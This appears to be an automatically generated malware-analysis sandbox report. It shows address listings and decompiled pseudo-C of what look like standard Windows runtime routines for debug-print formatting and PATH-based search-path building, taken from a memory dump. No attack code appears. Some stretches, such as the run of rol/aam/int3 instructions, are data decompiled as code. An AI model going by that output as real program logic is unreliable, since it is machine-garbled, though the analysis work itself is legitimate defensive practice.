                                                                                            0x04cfb9bb
                                                                                            0x04cfb9c0
                                                                                            0x04cfb9c3
                                                                                            0x04cfb9ca
                                                                                            0x04cfb9cc
                                                                                            0x04cfb9cf
                                                                                            0x04cfb9d3
                                                                                            0x04cfb9d7
                                                                                            0x04cfba94
                                                                                            0x04cfba94
                                                                                            0x04cfba98
                                                                                            0x04cfbaa3
                                                                                            0x04d42ccb
                                                                                            0x04cfbaa9
                                                                                            0x04cfbaa9
                                                                                            0x04cfbaa9
                                                                                            0x04cfbab1
                                                                                            0x04d42cd5
                                                                                            0x04d42cdd
                                                                                            0x04d42cdd
                                                                                            0x04cfbabb
                                                                                            0x04cfbabc
                                                                                            0x04cfbac2
                                                                                            0x04cfbac3
                                                                                            0x04cfbac3
                                                                                            0x04cfbac6
                                                                                            0x00000000
                                                                                            0x04cfb9dd
                                                                                            0x04cfb9dd
                                                                                            0x04cfb9e7
                                                                                            0x04cfb9e7
                                                                                            0x04cfb9ec
                                                                                            0x04cfb9ec
                                                                                            0x04cfb9f1
                                                                                            0x04cfb9f5
                                                                                            0x04cfb9fa
                                                                                            0x04cfba00
                                                                                            0x04cfba0c
                                                                                            0x04cfba10
                                                                                            0x04cfba10
                                                                                            0x04cfba12
                                                                                            0x04cfba18
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cfbb26
                                                                                            0x04cfbb26
                                                                                            0x04cfba1e
                                                                                            0x04cfba1e
                                                                                            0x04cfba23
                                                                                            0x04cfba25
                                                                                            0x04cfba2c
                                                                                            0x04cfba30
                                                                                            0x04cfba35
                                                                                            0x04cfba35
                                                                                            0x04cfba41
                                                                                            0x04cfba46
                                                                                            0x04cfba4c
                                                                                            0x04cfba50
                                                                                            0x04cfba54
                                                                                            0x04cfba6a
                                                                                            0x04cfba6e
                                                                                            0x04cfba70
                                                                                            0x04cfba74
                                                                                            0x04cfba78
                                                                                            0x04cfba7a
                                                                                            0x04cfba7c
                                                                                            0x04cfba8e
                                                                                            0x04cfba90
                                                                                            0x04cfba92
                                                                                            0x04cfbb14
                                                                                            0x04cfbb14
                                                                                            0x04cfbb16
                                                                                            0x04cfbb16
                                                                                            0x00000000
                                                                                            0x04cfba7c
                                                                                            0x04cfbb0a
                                                                                            0x04cfbb0d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cfbb0f

                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04CFB9A5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID:
                                                                                            • API String ID: 885266447-0
                                                                                            • Opcode ID: 9f4ffe637e9f19565a201bd3fd192a4d400749c781ffa4ccf020b048069312c2
                                                                                            • Instruction ID: 257ccbb40c6ca31654b01a30a137b7905c752bbcfee5a0e7515771171a5e31c7
                                                                                            • Opcode Fuzzy Hash: 9f4ffe637e9f19565a201bd3fd192a4d400749c781ffa4ccf020b048069312c2
                                                                                            • Instruction Fuzzy Hash: B1515671A18341CFC760DF29C88092ABBE6FB88644F14896EFA9587354E734FD44CB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CDB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 78%
                                                                                            			E04CDB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x4daf7a8);
				E04D2D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E04D2D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E04D1D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E04D1F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L04D2DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E04D1B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E04D1B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E04D1E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E04D1A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                            0x04cdb171
                                                                                            0x04cdb171
                                                                                            0x04cdb171
                                                                                            0x04cdb171
                                                                                            0x04cdb171
                                                                                            0x04cdb176
                                                                                            0x04cdb17b
                                                                                            0x04cdb180
                                                                                            0x04cdb186
                                                                                            0x04cdb18f
                                                                                            0x04cdb198
                                                                                            0x04cdb1a4
                                                                                            0x04cdb1aa
                                                                                            0x04d34802
                                                                                            0x04d34802
                                                                                            0x04d34805
                                                                                            0x04d3480c
                                                                                            0x04d3480e
                                                                                            0x04cdb1d1
                                                                                            0x04cdb1d3
                                                                                            0x04cdb1de
                                                                                            0x04cdb1de
                                                                                            0x04d34817
                                                                                            0x04d3481e
                                                                                            0x04d34820
                                                                                            0x04d34822
                                                                                            0x04d34822
                                                                                            0x04d34824
                                                                                            0x04d34824
                                                                                            0x04d3482a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d34835
                                                                                            0x04d3483a
                                                                                            0x04d3483d
                                                                                            0x04d3483f
                                                                                            0x04d34842
                                                                                            0x04d34842
                                                                                            0x04d34842
                                                                                            0x04d34846
                                                                                            0x04d3484c
                                                                                            0x04d3484e
                                                                                            0x04d34851
                                                                                            0x04d34851
                                                                                            0x04d34853
                                                                                            0x04d34854
                                                                                            0x04d34854
                                                                                            0x04d34858
                                                                                            0x04d3485a
                                                                                            0x04d3485a
                                                                                            0x04d3485d
                                                                                            0x04d3485f
                                                                                            0x04d34861
                                                                                            0x04d34861
                                                                                            0x04d34866
                                                                                            0x04d3486b
                                                                                            0x04d3486e
                                                                                            0x04d34871
                                                                                            0x04d34876
                                                                                            0x04d34876
                                                                                            0x04d34878
                                                                                            0x04d3487b
                                                                                            0x04d34884
                                                                                            0x04d34884
                                                                                            0x00000000
                                                                                            0x04d3487d
                                                                                            0x04d3487d
                                                                                            0x04d34882
                                                                                            0x04d34889
                                                                                            0x04d34889
                                                                                            0x04d3488f
                                                                                            0x04d34891
                                                                                            0x04d348e0
                                                                                            0x04d348e2
                                                                                            0x04d348e4
                                                                                            0x04d348e4
                                                                                            0x04d348e7
                                                                                            0x04d348e7
                                                                                            0x04d348ed
                                                                                            0x04d348f4
                                                                                            0x04d348f6
                                                                                            0x04d34951
                                                                                            0x04d34951
                                                                                            0x04d34953
                                                                                            0x04d34953
                                                                                            0x04d34956
                                                                                            0x04d34956
                                                                                            0x04d34958
                                                                                            0x04d34959
                                                                                            0x04d34959
                                                                                            0x04d3495d
                                                                                            0x04d3495d
                                                                                            0x04d3495f
                                                                                            0x04d3495f
                                                                                            0x04d34965
                                                                                            0x04d34969
                                                                                            0x04d349ba
                                                                                            0x04d349ba
                                                                                            0x04d349c1
                                                                                            0x04d349c5
                                                                                            0x04d349cc
                                                                                            0x04d349d4
                                                                                            0x04d349d7
                                                                                            0x04d349da
                                                                                            0x04d349e4
                                                                                            0x04d349e5
                                                                                            0x04d349f3
                                                                                            0x04d34a02
                                                                                            0x00000000
                                                                                            0x04d34a02
                                                                                            0x04d34972
                                                                                            0x04d34974
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d34976
                                                                                            0x04d34979
                                                                                            0x04d34982
                                                                                            0x04d34983
                                                                                            0x04d34984
                                                                                            0x04d3498b
                                                                                            0x04d3498d
                                                                                            0x04d34991
                                                                                            0x04d34993
                                                                                            0x04d34999
                                                                                            0x04d3499d
                                                                                            0x04d349a2
                                                                                            0x04d349a2
                                                                                            0x04d349a2
                                                                                            0x04d34999
                                                                                            0x04d349ac
                                                                                            0x00000000
                                                                                            0x04d349b3
                                                                                            0x04d348f8
                                                                                            0x04d348fe
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d348fe
                                                                                            0x04d34895
                                                                                            0x04d3489c
                                                                                            0x04d348ad
                                                                                            0x04d348b2
                                                                                            0x04d348b5
                                                                                            0x04d348b7
                                                                                            0x04d348ba
                                                                                            0x04d348bc
                                                                                            0x04d348c6
                                                                                            0x04d348c6
                                                                                            0x04d348cb
                                                                                            0x04d348d1
                                                                                            0x04d348d4
                                                                                            0x04d348d8
                                                                                            0x04d348d8
                                                                                            0x00000000
                                                                                            0x04d348d8
                                                                                            0x04d348be
                                                                                            0x04d348c0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d348c2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d348c4
                                                                                            0x00000000
                                                                                            0x04d34882
                                                                                            0x04d3487b
                                                                                            0x04d34904
                                                                                            0x04d34906
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d34908
                                                                                            0x04d3490e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d34910
                                                                                            0x04d34917
                                                                                            0x04d34917
                                                                                            0x00000000
                                                                                            0x04d34917
                                                                                            0x04cdb1ba
                                                                                            0x04d347f9
                                                                                            0x04d347fc
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d347fc
                                                                                            0x04cdb1c0
                                                                                            0x04cdb1c0
                                                                                            0x04cdb1c3
                                                                                            0x04cdb1cb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: _vswprintf_s
                                                                                            • String ID:
                                                                                            • API String ID: 677850445-0
                                                                                            • Opcode ID: 2063da55697603ade047b001940b9325450b52641b674fbeb285ade9c4459d00
                                                                                            • Instruction ID: 2cafc989be823ece2e9b060ac76037926a963aef7d618eb8db9e2d4f8f9fd7d7
                                                                                            • Opcode Fuzzy Hash: 2063da55697603ade047b001940b9325450b52641b674fbeb285ade9c4459d00
                                                                                            • Instruction Fuzzy Hash: F351E075E002698EEF31CF64C844BAEBBB1FF05719F1041ADE859AB291D7786941CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D02581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 80%
                                                                                            			E04D02581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t226;
				signed int _t230;
				signed int _t247;
				signed int _t249;
				intOrPtr _t251;
				signed int _t254;
				signed int _t261;
				signed int _t264;
				signed int _t272;
				intOrPtr _t278;
				signed int _t280;
				signed int _t282;
				void* _t285;
				signed int _t286;
				unsigned int _t289;
				signed int _t293;
				signed int _t296;
				signed int _t300;
				intOrPtr _t312;
				signed int _t321;
				signed int _t323;
				signed int _t324;
				signed int _t328;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				void* _t336;
				void* _t339;

				_t333 = _t335;
				_t336 = _t335 - 0x4c;
				_v8 =  *0x4dcd360 ^ _t333;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t328 = 0x4dcb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t289 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t278 = 0x48;
				_t310 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t321 = 0;
				_v37 = (_v24 >> 0x0000001c & 0x00000003) == 1;
				if(_v48 <= 0) {
					L16:
					_t45 = _t278 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t329 = 0xc0000106;
						goto L32;
					} else {
						_t328 = L04CF4620(_t289,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t278);
						_v52 = _t328;
						__eflags = _t328;
						if(_t328 == 0) {
							_t329 = 0xc0000017;
							goto L32;
						} else {
							 *(_t328 + 0x44) =  *(_t328 + 0x44) & 0x00000000;
							_t50 = _t328 + 0x48; // 0x48
							_t323 = _t50;
							_t310 = _v32;
							 *((intOrPtr*)(_t328 + 0x3c)) = _t278;
							_t280 = 0;
							 *((short*)(_t328 + 0x30)) = _v48;
							__eflags = _t310;
							if(_t310 != 0) {
								 *(_t328 + 0x18) = _t323;
								__eflags = _t310 - 0x4dc8478;
								 *_t328 = ((0 | _t310 == 0x04dc8478) - 0x00000001 & 0xfffffffb) + 7;
								E04D1F3E0(_t323,  *((intOrPtr*)(_t310 + 4)),  *_t310 & 0x0000ffff);
								_t310 = _v32;
								_t336 = _t336 + 0xc;
								_t280 = 1;
								__eflags = _a8;
								_t323 = _t323 + (( *_t310 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t272 = E04D639F2(_t323);
									_t310 = _v32;
									_t323 = _t272;
								}
							}
							_t293 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t329 = _v68;
								__eflags = 0;
								 *((short*)(_t323 - 2)) = 0;
								goto L32;
							} else {
								_t282 = _t328 + _t280 * 4;
								_v56 = _t282;
								do {
									__eflags = _t310;
									if(_t310 != 0) {
										_t226 =  *(_v60 + _t293 * 4);
										__eflags = _t226;
										if(_t226 == 0) {
											goto L30;
										} else {
											__eflags = _t226 == 5;
											if(_t226 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t282 =  *(_v60 + _t293 * 4);
										 *(_t282 + 0x18) = _t323;
										_t230 =  *(_v60 + _t293 * 4);
										__eflags = _t230 - 8;
										if(_t230 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t230 * 4 +  &M04D02959))) {
												case 0:
													__ax =  *0x4dc8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E04D1F3E0(__edi,  *0x4dc848c, __ax & 0x0000ffff);
														__eax =  *0x4dc8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E04D1F3E0(_t323, _v80, _v64);
													_t267 = _v64;
													goto L26;
												case 2:
													 *0x4dc8480 & 0x0000ffff = E04D1F3E0(__edi,  *0x4dc8484,  *0x4dc8480 & 0x0000ffff);
													__eax =  *0x4dc8480 & 0x0000ffff;
													__eax = ( *0x4dc8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E04D1F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E04D1F3E0(_t323, _v76, _v36);
														_t267 = _v36;
													}
													L26:
													_t336 = _t336 + 0xc;
													_t323 = _t323 + (_t267 >> 1) * 2 + 2;
													__eflags = _t323;
													L27:
													_push(0x3b);
													_pop(_t269);
													 *((short*)(_t323 - 2)) = _t269;
													goto L28;
												case 6:
													__ebx =  *0x4dc575c;
													__eflags = __ebx - 0x4dc575c;
													if(__ebx != 0x4dc575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E04D1F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x4dc575c;
														} while (__ebx != 0x4dc575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x4dc8478 & 0x0000ffff = E04D1F3E0(__edi,  *0x4dc847c,  *0x4dc8478 & 0x0000ffff);
													__eax =  *0x4dc8478 & 0x0000ffff;
													__eax = ( *0x4dc8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E04D639F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x4dc6e58 & 0x0000ffff = E04D1F3E0(__edi,  *0x4dc6e5c,  *0x4dc6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x4dc6e58 & 0x0000ffff;
													__eax = ( *0x4dc6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t293 = _v16;
													_t310 = _v32;
													L29:
													_t282 = _t282 + 4;
													__eflags = _t282;
													_v56 = _t282;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t293 = _t293 + 1;
									_v16 = _t293;
									__eflags = _t293 - _v48;
								} while (_t293 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t230 =  *(_v60 + _t321 * 4);
						if(_t230 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t230 * 4 +  &M04D02935))) {
							case 0:
								__ax =  *0x4dc8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t310 =  &_v64;
								_v80 = E04D02E3E(0,  &_v64);
								_t278 = _t278 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x4dc8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4dc8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E04CEEEF0(0x4dc79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E04CEEB70(__ecx, 0x4dc79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t204 = _v72;
											__eflags = _t204;
											if(_t204 != 0) {
												L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t204);
											}
											_t205 = _v52;
											__eflags = _t205;
											if(_t205 != 0) {
												__eflags = _t329;
												if(_t329 < 0) {
													L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t205);
													_t205 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t289 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x4dc7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L04CF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E04CEEB70(__ecx, 0x4dc79a0);
										__eax = _v52;
										L36:
										_pop(_t322);
										_pop(_t330);
										__eflags = _v8 ^ _t333;
										_pop(_t279);
										return E04D1B640(_t205, _t279, _v8 ^ _t333, _t310, _t322, _t330);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t274 = _v56;
								if(_v56 != 0) {
									_t310 =  &_v36;
									_t276 = E04D02E3E(_t274,  &_v36);
									_t289 = _v36;
									_v76 = _t276;
								}
								if(_t289 == 0) {
									goto L44;
								} else {
									_t278 = _t278 + 2 + _t289;
								}
								goto L14;
							case 6:
								__eax =  *0x4dc5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x4dc8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4dc8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x4dc6e58 & 0x0000ffff;
								__eax = ( *0x4dc6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t321 = _t321 + 1;
								if(_t321 >= _v48) {
									goto L16;
								} else {
									_t310 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("rol byte [esi], 1");
					asm("daa");
					asm("rol byte [esi+ebp], 1");
					asm("rol byte [es:esi+eax*2], 1");
					asm("rol byte [es:edi+ebx], 1");
					asm("aam 0x4");
					asm("aam 0x4");
					asm("rol byte [eax+eax*4], 1");
					asm("daa");
					asm("rol byte [esi+ebx], 1");
					asm("daa");
					asm("rol byte [eax+ebx*8], 1");
					_t285 = 0x25;
					asm("aam 0x4");
					asm("rol byte [esp+esi], 1");
					_pop(_t339);
					asm("aam 0x4");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x4daff00);
					E04D2D08C(_t285, _t323, _t328);
					_v44 =  *[fs:0x18];
					_t324 = 0;
					 *_a24 = 0;
					_t286 = _a12;
					__eflags = _t286;
					if(_t286 == 0) {
						_t247 = 0xc0000100;
					} else {
						_v8 = 0;
						_t331 = 0xc0000100;
						_v52 = 0xc0000100;
						_t249 = 4;
						while(1) {
							_v40 = _t249;
							__eflags = _t249;
							if(_t249 == 0) {
								break;
							}
							_t300 = _t249 * 0xc;
							_v48 = _t300;
							__eflags = _t286 -  *((intOrPtr*)(_t300 + 0x4cb1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t264 = E04D1E5C0(_a8,  *((intOrPtr*)(_t300 + 0x4cb1668)), _t286);
									_t339 = _t339 + 0xc;
									__eflags = _t264;
									if(__eflags == 0) {
